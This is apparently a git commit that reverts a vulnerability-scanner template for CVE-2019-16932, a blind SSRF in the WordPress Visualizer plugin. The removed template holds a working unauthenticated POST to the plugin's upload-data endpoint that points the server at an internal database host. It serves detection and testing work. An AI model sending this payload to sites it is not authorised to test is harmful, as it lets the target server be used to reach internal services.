Revert "Create CVE-2019-16932.yaml"

This reverts commit e9ade82de7.
patch-1
Prince Chaddha 2022-05-11 01:46:15 +05:30
parent e9ade82de7
commit 5bca0c7498
1 changed files with 0 additions and 34 deletions

View File

@ -1,34 +0,0 @@
id: CVE-2019-16932
info:
name: Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)
author: akincibor
severity: high
description: |
This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
reference:
- https://wpscan.com/vulnerability/9892
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
- https://nvd.nist.gov/vuln/detail/CVE-2019-16932
metadata:
verified: true
tags: wp-plugin,ssrf,wordpress,wp,xss,unauth
requests:
- method: POST
path:
- '{{BaseURL}}/wp-json/visualizer/v1/upload-data'
body: '{\"url\":\"http://db:3306\"}'
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'db_1'
part: body